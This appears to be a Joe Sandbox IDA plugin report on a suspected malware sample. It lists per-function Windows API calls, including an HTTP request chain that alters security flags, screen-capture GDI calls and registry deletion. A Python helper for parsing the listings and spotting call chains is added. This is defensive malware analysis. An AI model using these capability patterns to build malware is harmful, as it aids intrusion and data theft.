• Opcode ID: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
• Instruction ID: b760cad8f79e3e058591422984d926217442d5ecc026d8ff45c8b50e09cce0ef
• Opcode Fuzzy Hash: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
• Instruction Fuzzy Hash: 44710970A44205BEFB319F24CC89F9EBFA8FF04324F208226F5186A1E1C7B5A950D794
APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000C5504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C5515
• CharNextW.USER32(00000158), ref: 000C5544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000C5585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000C559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C55AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: MessageSend$CharNext
• String ID: more than two branches$p]
• API String ID: 1350042424-2651976212
• Opcode ID: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
• Instruction ID: 77b2b532268f8cca6a525c7ceb926acad27a4b7f9afcf1057e45b79ad79c2495
• Opcode Fuzzy Hash: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
• Instruction Fuzzy Hash: 58619038904608AFEF208F54CC84EFF7BB9EB09726F104149F525A7291D774AAC1DB60
APIs
  • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
• DestroyWindow.USER32(?), ref: 00048C81
• KillTimer.USER32(00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00086973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869A1
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000), ref: 000869D4
• DeleteObject.GDI32(00000000), ref: 000869E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: p]
• API String ID: 641708696-1923361398
• Opcode ID: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
• Instruction ID: b708711d5dcd142c9c273a3fe36a910396930281fd33be29a12bfc598ebf2fbc
• Opcode Fuzzy Hash: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
• Instruction Fuzzy Hash: C3618F70502610EFDB35AF14D988B2D77F1FB40316F15892DE086979A0CB7AA9C0CF59
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC4C3
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC4D7
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC584
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC5DC
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC5F0
• InternetCloseHandle.WININET(00000000), ref: 000AC5FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
• Instruction ID: 11b651ea5bc8e67933e2d4d2cb9fd2c4018ef2b4f1ea5e0a2fa157deb7b4f59b
• Opcode Fuzzy Hash: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
• Instruction Fuzzy Hash: FE516DB0500604BFFB218FA0C948EAB7BFCFF09744F014519F94A96610DB34E944DB60
APIs
  • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
• GetSysColor.USER32(0000000F), ref: 00049862
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ColorLongWindow
• String ID: p]
• API String ID: 259745315-1923361398
• Opcode ID: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
• Instruction ID: d3703ca40d5d1052f4d57c946c56ec68ed54d76aedda3dbd9d73367a23782f0e
• Opcode Fuzzy Hash: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
• Instruction Fuzzy Hash: 32417271104640AFEB205B3DDC44FBA3BA5BB06330F284669FAA6871E5DB759C42DB24
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 000C8592
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85A2
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85AD
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85BA
• GlobalLock.KERNEL32(00000000), ref: 000C85C8
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85D7
• GlobalUnlock.KERNEL32(00000000), ref: 000C85E0
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E7
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85F8
• OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,000CFC38,?), ref: 000C8611
• GlobalFree.KERNEL32(00000000), ref: 000C8621
• GetObjectW.GDI32(?,00000018,?), ref: 000C8641
• CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 000C8671
• DeleteObject.GDI32(?), ref: 000C8699
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000C86AF
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
• Instruction ID: 32152631a708fe18898ae450fa3a062024e5e919e0ada5931f875db4321d4c9d
• Opcode Fuzzy Hash: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
• Instruction Fuzzy Hash: BF410A75600204BFEB119FA5DD88EAE7BB8FF89711F148058F909E7260DB749D01DB64
APIs
• VariantInit.OLEAUT32(00000000), ref: 000A1502
• VariantCopy.OLEAUT32(?,?), ref: 000A150B
• VariantClear.OLEAUT32(?), ref: 000A1517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000A15FB
• VarR8FromDec.OLEAUT32(?,?), ref: 000A1657
• VariantInit.OLEAUT32(?), ref: 000A1708
• SysFreeString.OLEAUT32(?), ref: 000A178C
• VariantClear.OLEAUT32(?), ref: 000A17D8
• VariantClear.OLEAUT32(?), ref: 000A17E7
• VariantInit.OLEAUT32(00000000), ref: 000A1823
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: e3af595ec9ae828f54dc6c3bb94b337a0b2920b754dcdf663c937626013110eb
• Instruction ID: bc6d2083f92c7e82dcec5c2161a838949098f11ef6d39a15563569aeb92b7912
• Opcode Fuzzy Hash: e3af595ec9ae828f54dc6c3bb94b337a0b2920b754dcdf663c937626013110eb
• Instruction Fuzzy Hash: FCD10E71E00A05EBEB209FA4D895BFDB7B5BF46700F10806AE456AF181DB30EC41DBA1
APIs
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
  • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
  • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BB6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BB772
• RegDeleteValueW.ADVAPI32(?,?), ref: 000BB80A
• RegCloseKey.ADVAPI32(?), ref: 000BB87E
• RegCloseKey.ADVAPI32(?), ref: 000BB89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 000BB8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BB904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 000BB922
• FreeLibrary.KERNEL32(00000000), ref: 000BB983
• RegCloseKey.ADVAPI32(00000000), ref: 000BB994
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
• Instruction ID: 96951f22c13feca6e884b6fae4d2f18ea9b4bc551357cb50b1bb8483d6b836d8
• Opcode Fuzzy Hash: b1e374eaaa1d458aee063761217fe0112797cde2f3eeb8d522a3edc35c0aca98
• Instruction Fuzzy Hash: F1C1AF34208201AFD725DF14C494FAABBE5FF85318F14845CF59A8B2A2CBB5ED45CB91
APIs
  • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C8D5A
• GetFocus.USER32 ref: 000C8D6A
• GetDlgCtrlID.USER32(00000000), ref: 000C8D75
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 000C8E1D
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000C8ECF
• GetMenuItemCount.USER32(?), ref: 000C8EEC
• GetMenuItemID.USER32(?,00000000), ref: 000C8EFC
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000C8F2E
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000C8F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C8FA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0$p]
• API String ID: 1026556194-498393191
• Opcode ID: e6b1f79cbcebf845e547112a99f205d9191581cf5e250028b2dc5477cb59dc19
• Instruction ID: 1a384850197eca238cbc91ad6a4d1256e79804a3969b1575ace1fbe96f2080a5
• Opcode Fuzzy Hash: e6b1f79cbcebf845e547112a99f205d9191581cf5e250028b2dc5477cb59dc19
• Instruction Fuzzy Hash: AD818C71508301ABE750CF24C884FAF7BE9FB89314F04892DF98997292DB74D941CBA5
APIs
• GetDC.USER32(00000000), ref: 000B25D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
• CreateCompatibleDC.GDI32(?), ref: 000B25F4
• SelectObject.GDI32(00000000,?), ref: 000B2601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000B26AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
• SelectObject.GDI32(?,?), ref: 000B26D8
• DeleteObject.GDI32(?), ref: 000B26E1
• DeleteDC.GDI32(?), ref: 000B26E8
• ReleaseDC.USER32(00000000,?), ref: 000B26F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 971a587c185f335ff74c1781f4c727872590258c0ee3bf7cd271d73aa08640f3
• Instruction ID: 876d65c138f2d1a39dfb8c82251c390dfd0dd135ce49638b08bbf1eb2e81fef2
• Opcode Fuzzy Hash: 971a587c185f335ff74c1781f4c727872590258c0ee3bf7cd271d73aa08640f3
• Instruction Fuzzy Hash: F861F0B5D00219EFDB14CFA8D884EEEBBB5FF48310F248529E959A7250D774A9418FA0
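Triage helper, added here as an example and not part of the Joe Sandbox report or of the analysed sample: it parses the bullet lines of the "APIs" listings in the form the IDA plugin prints them (the WinINet request chain at 000AC4B0 to 000AC5FB and the GDI capture chain at 000B25D8 to 000B26F3 above), names the few argument constants whose meaning is fixed by the Win32 SDK headers (0x1F passed to InternetQueryOptionW/InternetSetOptionW is INTERNET_OPTION_SECURITY_FLAGS; 0x00CC0020 passed to StretchBlt is SRCCOPY), and checks whether a function contains a given call sequence in order. The sample input is copied from the two listings; the constant table and the two chain definitions are the example's own choices, and pointer-typed arguments are deliberately left undecoded because the plugin's rendering of them is ambiguous.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox IDA-plugin report.

Added example (not part of the report). Turns "Api.MODULE(args), ref: addr"
bullet lines into records, names a few fixed Win32 constants, and checks
for an ordered call chain (gaps allowed) inside one function.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple, Union

Arg = Union[int, str, None]  # hex value, string literal, or None for "?"

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"  # GetFocus / _wcslen entries carry no argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


def parse_arg(tok: str) -> Arg:
    """'?' -> None; 8-digit hex (optionally negative) -> int; otherwise a literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", tok)
    if m:
        value = int(m.group(2), 16)
        return -value if m.group(1) else value
    return tok  # e.g. advapi32.dll or RegDeleteKeyExW


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "APIs", "Strings" headers, blank lines
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall_of=int(sub, 16) if sub else None))
    return calls


# (api, zero-based argument index) -> {value: SDK name}. Only values whose
# meaning is fixed by the headers; pointer-typed arguments are left alone.
KNOWN_CONSTANTS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("InternetQueryOptionW", 1): {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("InternetSetOptionW", 1): {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoW", 1): {0x5: "HTTP_QUERY_CONTENT_LENGTH"},
    ("StretchBlt", 10): {0x00CC0020: "SRCCOPY"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ"},
    ("CreateFileW", 4): {0x3: "OPEN_EXISTING"},
    ("SendMessageW", 1): {0x172: "STM_SETIMAGE"},
    ("PostMessageW", 1): {0x111: "WM_COMMAND"},
}


def annotate(call: ApiCall) -> Dict[int, str]:
    """Argument index -> symbolic name for the constants in KNOWN_CONSTANTS."""
    names: Dict[int, str] = {}
    for idx, value in enumerate(call.args):
        table = KNOWN_CONSTANTS.get((call.api, idx))
        if table and isinstance(value, int) and value in table:
            names[idx] = table[value]
    return names


def has_ordered_chain(calls: Sequence[ApiCall], chain: Sequence[str]) -> bool:
    """True if every API in `chain` occurs in `calls` in that order (subcalls ignored)."""
    remaining = iter(c.api for c in calls if c.subcall_of is None)
    return all(any(api == want for api in remaining) for want in chain)


SCREEN_CAPTURE_CHAIN = ("GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits")
WININET_REQUEST_CHAIN = ("InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW")

# Constructed input: lines copied from the listings on this page.
SAMPLE_LINES = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
• GetDC.USER32(00000000), ref: 000B25D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
  • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
• GetFocus.USER32 ref: 000C8D6A
"""

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.api}.{c.module} {annotate(c) or ''}")
```

Paste a whole "APIs" block into `SAMPLE_LINES` (or read it from a saved report) and extend `KNOWN_CONSTANTS` only with values whose type is a DWORD flag or enum; the plugin prints pointer arguments as whatever it could resolve, so a value such as the 00000100 third argument to InternetSetOptionW should not be read as the flag word without confirming it in the disassembly.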
APIs
• ___free_lconv_mon.LIBCMT ref: 0006DAA1
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D659
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D66B
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D67D
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D68F
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6A1
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6B3
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6C5
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6D7
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6E9
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6FB
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D70D
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D71F
  • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D731
• _free.LIBCMT ref: 0006DA96
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 0006DAB8
                                                                                      • _free.LIBCMT ref: 0006DACD
                                                                                      • _free.LIBCMT ref: 0006DAD8
                                                                                      • _free.LIBCMT ref: 0006DAFA
                                                                                      • _free.LIBCMT ref: 0006DB0D
                                                                                      • _free.LIBCMT ref: 0006DB1B
                                                                                      • _free.LIBCMT ref: 0006DB26
                                                                                      • _free.LIBCMT ref: 0006DB5E
                                                                                      • _free.LIBCMT ref: 0006DB65
                                                                                      • _free.LIBCMT ref: 0006DB82
                                                                                      • _free.LIBCMT ref: 0006DB9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                      • Instruction ID: 551bb117f3117c10848991871839812c617d277902a6eb395c088ae7af53544e
                                                                                      • Opcode Fuzzy Hash: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                      • Instruction Fuzzy Hash: 1B315831B08604DFEB65AA79E845BAAB7EBFF40350F15442AE449D7192DF30EC80CB20
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0009369C
                                                                                      • _wcslen.LIBCMT ref: 000936A7
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00093797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0009380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 0009385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00093882
                                                                                      • GetParent.USER32(?), ref: 000938A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 000938A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00093921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0009395D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
